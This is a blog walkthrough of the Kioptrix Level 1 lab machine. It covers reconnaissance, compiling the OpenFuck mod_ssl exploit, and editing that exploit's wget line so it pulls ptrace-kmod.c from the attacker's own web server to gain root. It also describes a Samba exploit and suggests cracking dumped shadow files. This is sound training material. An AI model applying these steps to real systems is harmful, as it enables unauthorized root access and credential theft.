Kioptrix Level 1 walkthrough

Kioptrix level 1 is one of the easiest boot-to-root machine. It is best suited for beginners to practice their pentesting skills. In this article, we will talk about how to hack kioptrix level 1.

Kioptrix level 1 is Red-hat linux 32 bit machine which can easily be run with just 512 MB. You can download the virtual machine from the vulnhub. I hope the reader of this article can figure out how to setup this in a virtual machine.

The host machine would be kali 2019.3. The virtualbox version is 6.0.

So,after booting up the machine from the virtualbox, we need to find its ip address.We will use the tool netdiscover.

The result:

192.168.56.102 is the kioptrix machine.

Let's run a simple nmap scan using this ip address.

The result:

So, basically, we have 6 ports open. Port 22 is ssh using OpenSSH 2.9p2. Port 80 and 443 are using Apache 1.3.20 and mod_ssl version 2.8.4. We also have port 32768 and port 111 which seems to RPCs. Lastly, we have port 139 running samba but no version info is given.

Openssh

Based on what we have now, let's try to connect to ssh and see what we got.

Since kioptrix is quite old machine, key exchange algorithm for ssh is very old which means cipher text algorithm is also very old. We need to specify a key exchange algorithm and cipher algorithm supported by kioptrix which connecting to it.



So, after connecting to it, we tried a few passwords but it didn't worked. Although, in theory, we can try to brute-force the password but let's keep that as our last resort.

We know that ssh version is openssh 2.9p2. Let's find an exploit and get a root shell.


Seems like OpenSSH 2.9p2 is vulnerable to off-by-one attack. Let's read the text.


So, as per the text, we can exploit only after authentication. Since we don't have the password, we cannot exploit it.

As an attacker, you just need to find one weakness to get in. So, let's move on the next one.

Apache server

Let's go to website: http://192.168.56.105 and https://192.168.56.105.



Well, it is just a test page so it seems like we don't have a website here to hack and get it. But, we know that version of apache server and module mod_ssl which provides cryptography support for TLS and SSL protocol.

Let's find an exploit and get a root shell!



well,good news!! our version of mod_ssl is vulnerable to buffer overflow. There are about 3 versions of the same exploit OpenFuck. We will try the latest version.

So, we copied it using
$cat /usr/share/exploitdb/exploits/unix/remote/47080.c > exploit_ssl_kioptrix.c

and before installing,you need to install libssl-dev as it is required by the script. Remember the version of apache server is 1.3.20. When you compile the script using : $gcc -o exploit_ssl_kioptrix  exploit_ssl_kioptrix.c -lcrypto and execute: $./exploit_ssl_kioptrix

Now, you will see that the output gives you the exploit format and asks you to mention the target. If you use the target 0x6a, it won't work.



We will try the target 0x6b.


If you notice, the exploit is trying to connect to download ptrace-kmod.c but it is unable to do so because we running the machine in a private network. So, we need to download that file, host it locally and change the link in the source code.

To host a file locally, we can use python and execute this command in the folder where you have downloaded ptrace-kmod.c :
$python -m SimpleHTTPServer

In the exploit code, we need to replace "wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c" with "wget http://192.168.56.1:8000/ptrace-kmod.c". The ip address should be your local kali linux machine address(in my case, it was 192.168.56.1 and the server was on 8000 port number)

Compiling it again and executing it, we get:

Finally, we get the root shell!!!

The flag is in the mail. So,let's read our mail.



Booyah!! we got the flag too.

SAMBA

Now let's try to exploit samba. The first step is to find the version of the samba running on the machine. We can use the metasploit auxiliary to find the correct version of samba.

Using metasploit auxiliary, we get


We got the version of Samba which is 2.2.1a. We just have to find the exploit matching this version of samba.


Now let's find the options to set in the exploit by execute it.


Let's execute it by setting it with options.

We got the root shell!!!!


Things to do

You can dump the passwd and shadow file. Use them to crack password of the user accounts and login directly into the machine. Beware it might take a long time! 
You can also exploit samba using metasploit. Have Fun!

Comments

Popular posts from this blog

Loading GootLoader

AUDI SQLi Labs Lesson 1 walkthrough

Lokibot Campaign